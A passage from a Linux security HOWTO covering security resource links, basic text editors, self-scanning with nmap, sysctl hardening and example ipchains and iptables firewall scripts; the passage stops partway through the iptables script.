NAT-HOWTO.html] http://netfilter.samba.org/documentation/HOWTO/
NAT-HOWTO.html
  * Port number assignments, and what that scanner may be scanning for:
[http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls
/firewall-seen.html
[http://www.sans.org/newlook/resources/IDFAQ/oddports.htm] http://
www.sans.org/newlook/resources/IDFAQ/oddports.htm
[http://www.iana.org/assignments/port-numbers] http://www.iana.org/
assignments/port-numbers, the official assignments.
  * General security sites. These all have areas on documentation, alerts,
newsletters, mailing lists, and other resources.
Linux Security.com: [http://www.linuxsecurity.com] http://
www.linuxsecurity.com, loaded with good info, and Linux specific. Lots of
good docs: [http://www.linuxsecurity.com/docs/] http://
www.linuxsecurity.com/docs/
CERT, [http://www.cert.org] http://www.cert.org
The SANS Institute: [http://www.sans.org/] http://www.sans.org/
The Coroner's Toolkit (TCT): [http://www.fish.com/security/] http://
www.fish.com/security/, discussions and tools for dealing with post
break-in issues (and preventing them in the first place).
  * Privacy:
Junkbuster: [http://www.junkbuster.com] http://www.junkbuster.com, a web
proxy and cookie manager.
PGP: [http://www.gnupg.org/] http://www.gnupg.org/
  * Other documentation and reference sites:
Linux Security.com: [http://www.linuxsecurity.com/docs/] http://
www.linuxsecurity.com/docs/
Linux Newbie: [http://www.linuxnewbie.org/nhf/intel/security/index.html]
http://www.linuxnewbie.org/nhf/intel/security/index.html
The comp.os.linux.security FAQ: [http://www.linuxsecurity.com/docs/
colsfaq.html] http://www.linuxsecurity.com/docs/colsfaq.html
The Internet Firewall FAQ: [http://www.interhack.net/pubs/fwfaq/] http://
www.interhack.net/pubs/fwfaq/
The Site Security Handbook RFC: [http://www.ietf.org/rfc/rfc2196.txt]
http://www.ietf.org/rfc/rfc2196.txt
  * Miscellaneous sites of interest:
[http://www.bastille-linux.org] http://www.bastille-linux.org, for
Mandrake and Red Hat only.
SAINT: [http://www.wwdsi.com/saint/] http://www.wwdsi.com/saint/, system
security analysis.
SSL: [http://www.openssl.org/] http://www.openssl.org/
SSH: [http://www.openssh.org/] http://www.openssh.org/
Scan yourself: [http://www.hackerwhacker.com] http://
www.hackerwhacker.com
PAM: [http://www.kernel.org/pub/linux/libs/pam/index.html] http://
www.kernel.org/pub/linux/libs/pam/index.html
Detecting Trojaned Linux Kernel Modules: [http://members.prestige.net/
tmiller12/papers/lkm.htm] http://members.prestige.net/tmiller12/papers/
lkm.htm
Rootkit checker: [http://www.chkrootkit.org] http://www.chkrootkit.org
Port scanning tool nmap's home page: [http://www.insecure.org] http://
www.insecure.org
Nessus, more than just a port scanner: [http://www.nessus.org] http://
www.nessus.org
Tripwire, intrusion detection: [http://www.tripwire.org] http://
www.tripwire.org
Snort, sniffer and more: [http://www.snort.org] http://www.snort.org
[http://www.mynetwatchman.com] http://www.mynetwatchman.com and [http://
dshield.org] http://dshield.org are "Distributed Intrusion Detection
Systems". They collect log data from subscribing "agents", and collate
the data to find and report malicious activity. If you want to fight
back, check these out.
-----------------------------------------------------------------------------
8.6. Editing Text Files
By Bill Staehle
All the world is a file.
There are a great many types of files, but I'm going to stretch it here, and
class them into two really broad families:
  Text files are just that.
  Binary files are not.
Binary files are meant to be read by machines; text files can be easily
edited, and are generally read by people. But text files can be (and
frequently are) read by machines. Examples of this would be configuration
files, and scripts.
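As a quick illustration of the distinction, GNU grep's -I flag (a GNU
extension, so this is a sketch that assumes GNU grep) treats files that look
binary as containing no matches, which makes for a crude text-vs-binary test:

```shell
# Crude text-vs-binary check: with -I, grep reports no matches in a
# binary file, so an empty pattern ('' matches every line) succeeds
# only on text files.
is_text() { grep -qI '' "$1" && echo "text" || echo "binary"; }

printf 'hello world\n' > /tmp/sample.txt   # a small text file
printf '\000\001\002'  > /tmp/sample.bin   # a few raw binary bytes

is_text /tmp/sample.txt    # prints "text"
is_text /tmp/sample.bin    # prints "binary"
```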
There are a number of different text editors available in *nix. A few are
found on every system. That would be '/bin/ed' and '/bin/vi'. 'vi' is almost
always a clone such as 'vim' due to license problems. The problem with 'vi'
and 'ed' is that they are terribly user unfriendly. Another common editor
that is not always installed by default is 'emacs'. It has a lot more
features and capability, and is not easy to learn either.
As to 'user friendly' editors, 'mcedit' and 'pico' are good choices to start
with. These are often much easier for those new to *nix.
The first things to learn are how to exit an editing session, how to save
changes to the file, and then how to avoid breaking long lines that should
not be broken (wrapped).
The 'vi' editor
'vi' is one of the most common text editors in the Unix world, and it's
nearly always found on any *nix system. Actually, due to license problems,
the '/bin/vi' on a Linux system is always a 'clone', such as 'elvis', 'nvi',
or 'vim' (there are others). These clones can act exactly like the original
'vi', but usually have additional features that make it slightly less
impossible to use.
So, if it's so terrible, why learn about it? Two reasons. First, as noted,
it's almost guaranteed to be installed, and other (more user friendly)
editors may not be installed by default. Second, many of the 'commands' work
in other applications (such as the pager 'less' which is also used to view
man pages). In 'less', accidentally pressing the 'v' key starts 'vi' in most
installations.
'vi' has two modes. The first is 'command mode', and keystrokes are
interpreted as commands. The other mode is 'insert' mode, where nearly all
keystrokes are interpreted as text to be inserted.
==> Emergency exit from 'vi'
1. Press the <esc> key up to three times, until the computer beeps, or the
   screen flashes.
2. Press the keys :q! <Enter>
That is: colon, the letter Q, and then the exclamation point, followed by the
Enter key.
'vi' commands are as follows. All of these are in 'command' mode:
a        Enter insertion mode after the cursor.
A        Enter insertion mode at the end of the current line.
i        Enter insertion mode before the cursor.
o        Enter insertion mode opening a new line BELOW current line.
O        Enter insertion mode opening a new line ABOVE current line.
h        move cursor left one character.
l        move cursor right one character.
j        move cursor down one line.
k        move cursor up one line.
/mumble  move cursor forward to next occurrence of 'mumble' in
         the text
?mumble  move cursor backward to next occurrence of 'mumble'
         in the text
n        repeat last search (? or / without 'mumble' to search for
         will do the same thing)
u        undo last change made
^B       Scroll back one window.
^F       Scroll forward one window.
^U       Scroll up one half window.
^D       Scroll down one half window.
:w       Write to file.
:wq      Write to file, and quit.
:q       quit.
:q!      Quit without saving.
<esc>    Leave insertion mode.
NOTE: The four 'arrow' keys almost always work in 'command' or 'insert' mode.
The 'ed' editor.
The 'ed' editor is a line editor. Other than the fact that it is virtually
guaranteed to be on any *nix computer, it has no socially redeeming features,
although some applications may need it. A _lot_ of things have been offered
to replace this 'thing' from 1975.
==> Emergency exit from 'ed'
1. Type a period on a line by itself, and press <Enter>. This gets you to the
   command mode, or prints a line of text if you were in command mode.
2. Type q and press <Enter>. If there were no changes to the file, this action
   quits ed. If you then see a '?', this means that the file had changed, and
   'ed' is asking if you want to save the changes. Press q and <Enter> a
   second time to confirm that you want out.
The 'pico' editor.
'pico' is a part of the Pine mail/news package from the University of
Washington (state, USA). It is a very friendly editor, with one minor
failing. It silently inserts a line feed character and wraps the line when it
exceeds (generally) 74 characters. While this is fine while creating mail,
news articles, and text notes, it is often fatal when editing system files.
The solution to this problem is simple. Call the program with the -w option,
like this:
pico -w file_2_edit
Pico is so user friendly, no further instructions are needed. It _should_ be
obvious (look at the bottom of the screen for commands). There is an
extensive help function. Pico is available with nearly all distributions,
although it _may_ not be installed by default.
==> Emergency exit from 'pico'
Press and hold the <Ctrl> key, and press the letter x. If no changes have been
made to the file, this will quit pico. If changes have been made, it will ask
if you want to save the changes. Pressing n will then exit.
The 'mcedit' editor.
'mcedit' is part of the Midnight Commander shell program, a full featured
visual shell for Unix-like systems. It can be accessed directly from the
command line ( mcedit file_2_edit ) or as part of 'mc' (use the arrow keys to
highlight the file to be edited, then press the F4 key).
mcedit is probably the most intuitive editor available, and comes with
extensive help. "commands" are accessed through the F* keys. Midnight
Commander is available with nearly all distributions, although it _may_ not
be installed by default.
==> Emergency exit from 'mcedit'
Press the F10 key. If no changes have been made to the file, this will quit
mcedit. If changes have been made, it will ask if you want to Cancel this
action. Pressing n will then exit.
-----------------------------------------------------------------------------
8.7. nmap
Let's look at a few quick examples of what nmap scans look like. The intent
here is to show how to use nmap to verify our firewalling, and system
integrity. nmap has other uses that we don't need to get into. Do NOT use
nmap on systems other than your own, unless you have permission from the
owner, and you know it is not a violation of anyone's Terms of Service. This
kind of thing will be taken as hostile by most people.
As mentioned previously, nmap is a sophisticated port scanning tool. It tries
to see if a host is "there", what ports might be open, and what states those
ports might be in. nmap has a complex command line and can do many types of
"scans". See the man page for all the nitty gritty.
A couple of words of warning first. If using portsentry, turn it off. It will
drop the route to wherever the scan is coming from. You might want to turn
off any logging also, or at least be aware that you might get copious logs if
doing multiple scans.
A simple, default scan of "localhost":
+---------------------------------------------------------------------------+
| # nmap localhost |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Interesting ports on bigcat (127.0.0.1): |
| (The 1507 ports scanned but not shown below are in state: closed) |
| |
| Port State Service |
| 22/tcp open ssh |
| 25/tcp open smtp |
| 37/tcp open time |
| 53/tcp open domain |
| 80/tcp open http |
| 3000/tcp open ppp |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds |
| |
| |
+---------------------------------------------------------------------------+
If you've read most of this document, you should be familiar with these
services by now. These are some of the same ports we've seen in other
examples. Some things to note on this scan: it only did 1500+ "interesting"
ports -- not all ports. This can be configured differently if more is
desirable (see man page). It only did TCP ports too. Again, configurable. It
only picks up "listening" services, unlike netstat that shows all open ports
-- listening or otherwise. Note that the last "open" port here, 3000, is
identified as "ppp". Wrong! That is just an educated guess by nmap based on
what is contained in /etc/services for this port number. Actually in this
case it is ntop (a network traffic monitor). Take the service names with a
grain of salt. There is no way for nmap to really know what is on that port.
Matching port numbers with service names can at times be risky. Many do have
standard ports, but there is nothing to say they have to use the commonly
associated port numbers.
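That guess is nothing more than a lookup in /etc/services. You can reproduce
roughly the same lookup with grep and awk; the sample entry below is
hypothetical, since the contents of /etc/services vary by distribution:

```shell
# A hypothetical /etc/services entry for port 3000 (real files vary).
line="$(printf 'ppp\t3000/tcp\t# User-level ppp daemon')"

# Roughly the lookup nmap does: find the port/protocol pair, and
# report the first field as the service name.
echo "$line" | grep -w '3000/tcp' | awk '{print $1}'   # prints "ppp"
```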
Notice that in all our netstat examples, we had two classes of open ports:
listening servers, and then established connections that we initiated to
other remote hosts (e.g. a web server somewhere). nmap only sees the first
group -- the listening servers! The other ports connecting us to remote
servers are not visible, and thus not vulnerable. These ports are "private"
to that single connection, and will be closed when the connection is
terminated.
So we have open and closed ports here. Simple enough, and gives a pretty good
idea what is running on bigcat -- but not necessarily what we look like to
the outside world since this was done from localhost, and wouldn't reflect
any firewalling or other access control mechanisms.
Let's do a little more intensive scan. Let's check all ports -- TCP and UDP.
+---------------------------------------------------------------------------+
| # nmap -sT -sU -p 1-65535 localhost |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Interesting ports on bigcat (127.0.0.1): |
| (The 131050 ports scanned but not shown below are in state: closed) |
| |
| Port State Service |
| 22/tcp open ssh |
| 25/tcp open smtp |
| 37/tcp open time |
| 53/tcp open domain |
| 53/udp open domain |
| 80/tcp open http |
| 3000/tcp open ppp |
| 8000/tcp open unknown |
| 32768/udp open unknown |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 385 seconds |
| |
| |
+---------------------------------------------------------------------------+
This is more than just "interesting" ports -- it is everything. We picked up
a couple of new ones in the process too. We've seen these before with netstat
, so we know what they are. That is the Junkbuster web proxy on port 8000/tcp
and named on 32768/udp. This scan takes much, much longer, but it is the only
way to see all ports.
So now we have a pretty good idea of what is open on bigcat. Since we are
scanning localhost from localhost, everything should be visible. We still
don't know how the outside world sees us though. Now I'll ssh to another host
on the same LAN, and try again.
+---------------------------------------------------------------------------+
| # nmap bigcat |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Interesting ports on bigcat (192.168.1.1): |
| (The 1520 ports scanned but not shown below are in state: closed) |
| |
| Port State Service |
| 22/tcp open ssh |
| 3000/tcp open ppp |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1 second |
| |
| |
+---------------------------------------------------------------------------+
I confess to tampering with the iptables rules here to make a point. Only two
visible ports on this scan. Everything else is "closed". So says nmap. Once
again:
+----------------------------------------------------------------------------------+
| # nmap bigcat |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| Note: Host seems down. If it is really up, but blocking our ping probes, try -P0 |
| |
| Nmap run completed -- 1 IP address (0 hosts up) scanned in 30 seconds |
| |
| |
+----------------------------------------------------------------------------------+
Oops, I blocked ICMP (ping) while I was at it this time. One more time:
+---------------------------------------------------------------------------+
| # nmap -P0 bigcat |
| |
| Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) |
| All 1523 scanned ports on bigcat (192.168.1.1) are: filtered |
| |
| Nmap run completed -- 1 IP address (1 host up) scanned in 1643 seconds |
| |
| |
+---------------------------------------------------------------------------+
That's it. Notice how long that took. Notice ports are now "filtered" instead
of "closed". How does nmap know that? Well for one, "closed" means bigcat
sent a packet back saying "nothing running here", i.e. port is closed. In
this last example, the iptables rules were changed to not allow ICMP (ping),
and to "DROP" all incoming packets. In other words, no response at all. A
subtle difference since nmap seems to still know there was a host there, even
though no response was given. One lesson here, is if you want to slow a
scanner down, "DROP" (or "DENY") the packets. This forces a TCP time out for
the remote end on each port probe. Anyway, if your scans look like this, that
is probably as well as can be expected, and your firewall is doing its job.
A brief note on UDP: nmap can not accurately determine the status of these
ports if they are "filtered". You probably will get a false-positive "open"
condition. This has to do with UDP being a connectionless protocol. If nmap
gets no answer (e.g. due to a "DROP"), it assumes the packets reached the
target, and thus the port will be reported as "open". This is "normal" for
nmap.
We can play with firewall rules in a LAN set up to try to simulate how the
outside world sees us, and if we are smart, and know what we are doing, and
don't have a brain fart, we probably will have a pretty good picture. But it
is still best to try to find a way to do it from outside if possible. Again,
make sure you are not violating any ISP rules of conduct. Do you have a
friend on the same ISP?
-----------------------------------------------------------------------------
8.8. Sysctl Options
The "sysctl" options are kernel parameters that can be configured via the /
proc filesystem. These can be dynamically adjusted at run-time. Typically
these options are off if set to "0", and on if set to "1".
Some of these have security implications, and that is why we are here ;-)
We'll just list the ones we think are relevant. Feel free to cut and paste
these into a firewall script, or other file that is run during boot (like /
etc/rc.local). Or your distribution may have their own way of tuning this.
You can read up on what these mean in /usr/src/linux/Documentation/sysctl/
README and other files in the kernel Documentation directories.
#!/bin/sh
#
# Configure kernel sysctl run-time options.
#
###################################################################
# Anti-spoofing blocks
for i in /proc/sys/net/ipv4/conf/*/rp_filter;
do
echo 1 > $i
done
# Ensure source routing is OFF
for i in /proc/sys/net/ipv4/conf/*/accept_source_route;
do
echo 0 > $i
done
# Ensure TCP SYN cookies protection is enabled
[ -e /proc/sys/net/ipv4/tcp_syncookies ] &&\
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
# Ensure ICMP redirects are disabled
for i in /proc/sys/net/ipv4/conf/*/accept_redirects;
do
echo 0 > $i
done
# Ensure oddball addresses are logged
[ -e /proc/sys/net/ipv4/conf/all/log_martians ] &&\
echo 1 > /proc/sys/net/ipv4/conf/all/log_martians
[ -e /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts ] &&\
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
[ -e /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses ] &&\
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
## Optional from here on down, depending on your situation. ############
# Ensure ip-forwarding is enabled if
# we want to do forwarding or masquerading.
[ -e /proc/sys/net/ipv4/ip_forward ] &&\
echo 1 > /proc/sys/net/ipv4/ip_forward
# On if your IP is dynamic (or you don't know).
[ -e /proc/sys/net/ipv4/ip_dynaddr ] &&\
echo 1 > /proc/sys/net/ipv4/ip_dynaddr
# eof
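Most current distributions will also apply such settings at boot from /etc/
sysctl.conf (read with sysctl -p). A fragment roughly equivalent to the script
above might look like the following. Note one difference: the conf/*/ loops in
the script touch every interface that exists when it runs, while in
sysctl.conf you typically set both the "all" and "default" trees:

```
# /etc/sysctl.conf fragment -- roughly equivalent to the script above.
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Optional, only for forwarding/masquerading gateways:
#net.ipv4.ip_forward = 1
#net.ipv4.ip_dynaddr = 1
```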
-----------------------------------------------------------------------------
8.9. Secure Alternatives
This section will give a brief run down on secure alternatives to potentially
insecure methods. This will be a hodge podge of clients and servers.
  * telnet, rsh - ssh
  * ftp, rcp - scp or sftp. Both are part of ssh packages. Also, files can
    easily be transferred via HTTP if Apache is already running anyway. Apache
    can be buttoned down even more by using SSL (HTTPS).
  * sendmail - postfix, qmail. Not to imply that current versions of sendmail
    are insecure. Just that there is some bad history there, and because it is
    so widely used, it makes an inviting crack target.
As noted above, Linux installations often include a fully functional mail
server. While this may have some advantages, it is not necessary in many
cases for simply sending mail, or retrieving mail. This can all be done
without a "mail server daemon" running locally.
  * POP3 - SPOP3, POP3 over SSL. If you really need to run your own POP
    server, this is the way to do it. If retrieving your mail from your ISP's
    server, then you are at their mercy as to what they provide.
  * IMAP - IMAPS, same as above.
  * If you find you need a particular service, and it is for just you or a
    few friends, consider running it on a non-standard port. Most server
    daemons support this, and it is not a problem as long as those who will
    be connecting know about it. For instance, the standard port for sshd is
    22. Any worm or scan will probe for this port number. So run it on a
    randomly chosen port. See the sshd man page.
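With OpenSSH, for example, that is a one-line change in sshd_config (the port
number below is an arbitrary example, not a recommendation):

```
# /etc/ssh/sshd_config -- listen on a non-standard port instead of 22.
Port 8222

# After restarting sshd, clients connect with the matching option:
#   ssh -p 8222 user@host
#   scp -P 8222 somefile user@host:     (note: capital P for scp)
```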
-----------------------------------------------------------------------------
8.10. Ipchains and Iptables Redux
This section offers a little more advanced look at some of things that
ipchains and iptables can do. These are basically the same scripts as in Step
3 above, just with some more advanced configuration options added. These will
provide "masquerading", "port forwarding", allow access to some user
definable services, and a few other things. Read the comments for
explanations.
-----------------------------------------------------------------------------
8.10.1. ipchains II
#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of ipchains (default).
IPCHAINS=/sbin/ipchains
# Local Interfaces
#
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"
# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"
# For static IP, set it here!
#WAN_IP="1.2.3.4"
# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all PUBLIC services.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"
# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"
# A list of ports that are to be forwarded.
#FORWARD_PORTS="25 80"
# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66
# If you need identd for a mail server, set this.
MAIL_SERVER=
# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'PUBLIC' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"
# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8 5.6.7.8"
## end user configuration options #################################
###################################################################
# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY
# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT
# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
[ -z "$WAN_IP" ] &&\
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \ -f 1`
# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1
WAN_MASK=`ifconfig $WAN_IFACE | grep Mask | cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"
## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPCHAINS -A input -l -i $WAN_IFACE -s 10.0.0.0/8 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 172.16.0.0/12 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 192.168.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 127.0.0.0/8 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 169.254.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 224.0.0.0/4 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 240.0.0.0/5 -j DENY
# Bogus routing
$IPCHAINS -A input -l -s 255.255.255.255 -d $ANYWHERE -j DENY
## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
echo 1 > /proc/sys/net/ipv4/ip_forward
$IPCHAINS -A input -i $LAN_IFACE -j ACCEPT
$IPCHAINS -A forward -s $LAN_NET -d $LAN_NET -j ACCEPT
$IPCHAINS -A forward -s $LAN_NET -d ! $LAN_NET -j MASQ
fi
## Blacklist hosts/nets
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will be
# logged.
for i in $BLACKLIST; do
$IPCHAINS -A input -l -s $i -j DENY
done
## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
$IPCHAINS -A input -s $i -j ACCEPT
done
# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
# NOTE: ipmasqadm is a separate package from ipchains and needs
# to be installed also. Check first!
[ -n "$FORWARD_HOST" ] && ipmasqadm portfw -f &&\
for i in $FORWARD_PORTS; do
ipmasqadm portfw -a -P tcp -L $WAN_IP $i -R $FORWARD_HOST $i
done
## Open, but Restricted Access ports/services
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP traffic
# from outside source.
[ -n "$DHCP_SERVER" ] &&\
$IPCHAINS -A input -p udp -s $DHCP_SERVER 67 -d $ANYWHERE 68 -j ACCEPT
# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
$IPCHAINS -A input -p tcp -s $MAIL_SERVER -d $WAN_IP 113 -j ACCEPT
# Open up PUBLIC server ports here (available to the world):
for i in $PUBLIC_PORTS; do
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $i -j ACCEPT
done
# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPCHAINS -A input -p tcp -s 255.10.9.8/29 -d $WAN_IP 110 -j ACCEPT
# Uncomment to allow ftp data back (active ftp). Not required for 'passive'
# ftp connections.
#$IPCHAINS -A input -p tcp -s $ANYWHERE 20 -d $WAN_IP $LOCAL_PORTS -y -j ACCEPT
# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
# We have already opened those services that need to accept SYNs,
# so SYNs are excluded here for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT
# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT
# Allow access to the masquerading ports conditionally. Masquerading
# uses its own port range -- on 2.2 kernels ONLY! 2.4 kernels do not
# use these ports, so comment out there!
[ -n "$LAN_NET" ] &&\
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP 61000: ! -y -j ACCEPT &&\
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP 61000: -j ACCEPT
## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input -p icmp --icmp-type echo-reply \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type destination-unreachable \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input -p icmp --icmp-type time-exceeded \
-s $ANYWHERE -i $WAN_IFACE -j ACCEPT
#######################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.
$IPCHAINS -A input -l -j DENY
echo "Ipchains firewall is up `date`."
##-- eof ipchains.sh
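As an aside, the LOCAL_PORTS construction near the top of this script just
joins the two tab-separated fields of /proc/sys/net/ipv4/ip_local_port_range
with a colon. A small sketch of the same pipeline, run against a sample file
rather than the real /proc entry (your kernel's actual range will differ):

```shell
# ip_local_port_range holds two tab-separated numbers (low and high);
# the script turns them into the "low:high" form ipchains expects.
# Demonstrated here on a sample value.
printf '1024\t4999\n' > /tmp/port_range_sample

LOCAL_PORTS=`cat /tmp/port_range_sample |cut -f1`:\
`cat /tmp/port_range_sample |cut -f2`

echo "$LOCAL_PORTS"    # prints "1024:4999"
```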
-----------------------------------------------------------------------------
8.10.2. iptables II
#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of iptables (default).
IPTABLES=/sbin/iptables
# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"
# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"
# For static IP, set it here!
#WAN_IP="1.2.3.4"
# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all Public services. Do not put any ports to be forwarded here,
# this is for direct access only.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"
# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"
# A list of ports that are to be forwarded.
#FORWARD_PORTS="25 80"
# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66
# If you need identd for a mail server, set this.
MAIL_SERVER=
# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'Public' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"
# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8 5.6.7.8"
## end user configuration options #################################
###################################################################
# Any and all addresses from anywhere.
ANYWHERE="0/0"
# These modules may need to be loaded:
modprobe ip_conntrack_ftp
modprobe ip_nat_ftp
# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F
$IPTABLES -X
# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP
# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT
# Get our dynamic IP now from the Inet interface. WAN_IP will be the
# address we are protecting from outside addresses.
[ -z "$WAN_IP" ] &&\
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \ -f 1`
# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1
WAN_MASK=`ifconfig $WAN_IFACE |grep Mask |cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"
## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPTABLES -A INPUT -i $WAN_IFACE -s 10.0.0.0/8 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 172.16.0.0/12 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 192.168.0.0/16 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 127.0.0.0/8 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 169.254.0.0/16 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 224.0.0.0/4 -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 240.0.0.0/5 -j DROP
# Bogus routing
$IPTABLES -A INPUT -s 255.255.255.255 -d $ANYWHERE -j DROP
# Unclean
